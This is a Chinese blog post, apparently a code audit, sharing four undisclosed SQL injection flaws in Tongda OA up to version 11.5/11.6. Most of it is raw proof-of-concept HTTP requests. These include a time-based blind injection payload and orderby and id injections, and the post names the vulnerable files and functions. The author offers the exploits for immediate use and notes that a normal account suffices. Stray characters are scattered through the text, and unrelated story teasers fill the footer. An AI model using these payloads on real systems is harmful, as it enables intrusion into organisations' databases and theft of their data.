代碼審計(jì) 之 通達(dá)OA多枚0day漏洞分享

HW被暫停了五续,沒事看看審計(jì),審了一些漏洞出來了樊卓,做一個(gè)分享哈。

影響范圍:

通達(dá)OA <= 11.5杠河、11.6版本(2020年04月17日發(fā)布了最新11.5版本也受影響)碌尔。


image.png

HW這幾天看到大家對通達(dá)OA的熱情度很高赶掖,正好今天有空,下載了一個(gè)通達(dá)OA 11.5版本下來做代碼審計(jì)七扰,通達(dá)OA的代碼是加密的,所以需要一個(gè)SeayDzend工具解密陪白,百度上就能找到颈走。


image.png

解密后,對代碼的各個(gè)模塊都大致看了一下咱士,很快就發(fā)現(xiàn)多處都存在SQL注入漏洞立由,仔細(xì)看了之前的曝光的文章,發(fā)現(xiàn)這些漏洞并未曝光序厉,也未預(yù)警锐膜,也屬于0day漏洞吧。
不多說弛房,直接上POC道盏,有需要的可以先拿到用了。

0x01 SQL注入 POC:

漏洞參數(shù):starttime

POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/portal/home/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Connection: keep-alive
Host: 192.168.43.169
Pragma: no-cache
X-Requested-With: XMLHttpRequest
Content-Length: 154
X-WVS-ID: Acunetix-Autologin/65535
Cache-Control: no-cache
Accept: */*
Origin: http://192.168.43.169
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
image.png

漏洞文件:webroot\general\appbuilder\modules\calendar\models\Calendar.php文捶。
get_callist_data函數(shù)接收傳入的begin_date變量未經(jīng)過濾直接拼接在查詢語句中造成注入荷逞。


image.png

利用條件:
一枚普通賬號登錄權(quán)限,但測試發(fā)現(xiàn)粹排,某些低版本也無需登錄也可注入种远。

0x02 SQL注入 POC:

漏洞參數(shù):orderby

GET /general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169/
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
image.png

漏洞文件:webroot\inc\utility_email.php,get_sentbox_data函數(shù)接收傳入?yún)?shù)未過濾顽耳,直接拼接在order by后面了造成注入坠敷。


image.png

利用條件:
一枚普通賬號登錄權(quán)限,但測試發(fā)現(xiàn)射富,某些低版本也無需登錄也可注入膝迎。

0x03 SQL注入 POC:

漏洞參數(shù):orderby

GET /general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total= HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
image.png

image.png

漏洞文件:webroot\inc\utility_email.php,get_email_data函數(shù)傳入?yún)?shù)未過濾胰耗,直接拼接在order by后面了造成注入弄抬。


image.png

利用條件:
一枚普通賬號登錄權(quán)限,但測試發(fā)現(xiàn)宪郊,某些低版本也無需登錄也可注入掂恕。
0x04 SQL注入 POC:
漏洞參數(shù):id

GET /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.43.169
Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Host: 192.168.43.169
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Connection: close
image.png

image.png

漏洞文件:
webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit函數(shù)中存在 一個(gè)$_GET["id"]; 未經(jīng)過濾弛槐,拼接到SQL查詢中懊亡,造成了SQL注入。


image.png

利用條件:
一枚普通賬號登錄權(quán)限乎串,但測試發(fā)現(xiàn)店枣,某些低版本也無需登錄也可注入。

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市鸯两,隨后出現(xiàn)的幾起案子闷旧,更是在濱河造成了極大的恐慌,老刑警劉巖钧唐,帶你破解...
    沈念sama閱讀 218,941評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件忙灼,死亡現(xiàn)場離奇詭異,居然都是意外死亡钝侠,警方通過查閱死者的電腦和手機(jī)该园,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,397評論 3 395
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來帅韧,“玉大人里初,你說我怎么就攤上這事『鲋郏” “怎么了双妨?”我有些...
    開封第一講書人閱讀 165,345評論 0 356
  • 文/不壞的土叔 我叫張陵,是天一觀的道長叮阅。 經(jīng)常有香客問我斥难,道長,這世上最難降的妖魔是什么帘饶? 我笑而不...
    開封第一講書人閱讀 58,851評論 1 295
  • 正文 為了忘掉前任哑诊,我火速辦了婚禮,結(jié)果婚禮上及刻,老公的妹妹穿的比我還像新娘镀裤。我一直安慰自己,他們只是感情好缴饭,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,868評論 6 392
  • 文/花漫 我一把揭開白布暑劝。 她就那樣靜靜地躺著,像睡著了一般颗搂。 火紅的嫁衣襯著肌膚如雪担猛。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,688評論 1 305
  • 那天丢氢,我揣著相機(jī)與錄音傅联,去河邊找鬼。 笑死疚察,一個(gè)胖子當(dāng)著我的面吹牛蒸走,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播貌嫡,決...
    沈念sama閱讀 40,414評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼比驻,長吁一口氣:“原來是場噩夢啊……” “哼该溯!你這毒婦竟也來了?” 一聲冷哼從身側(cè)響起别惦,我...
    開封第一講書人閱讀 39,319評論 0 276
  • 序言:老撾萬榮一對情侶失蹤狈茉,失蹤者是張志新(化名)和其女友劉穎,沒想到半個(gè)月后掸掸,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體氯庆,經(jīng)...
    沈念sama閱讀 45,775評論 1 315
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,945評論 3 336
  • 正文 我和宋清朗相戀三年猾漫,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片感凤。...
    茶點(diǎn)故事閱讀 40,096評論 1 350
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡悯周,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出陪竿,到底是詐尸還是另有隱情禽翼,我是刑警寧澤,帶...
    沈念sama閱讀 35,789評論 5 346
  • 正文 年R本政府宣布族跛,位于F島的核電站闰挡,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏礁哄。R本人自食惡果不足惜长酗,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,437評論 3 331
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望桐绒。 院中可真熱鬧夺脾,春花似錦、人聲如沸茉继。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,993評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽烁竭。三九已至菲茬,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間派撕,已是汗流浹背婉弹。 一陣腳步聲響...
    開封第一講書人閱讀 33,107評論 1 271
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留终吼,地道東北人马胧。 一個(gè)月前我還...
    沈念sama閱讀 48,308評論 3 372
  • 正文 我出身青樓,卻偏偏與公主長得像衔峰,于是被迫代替她去往敵國和親佩脊。 傳聞我的和親對象是個(gè)殘疾皇子蛙粘,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,037評論 2 355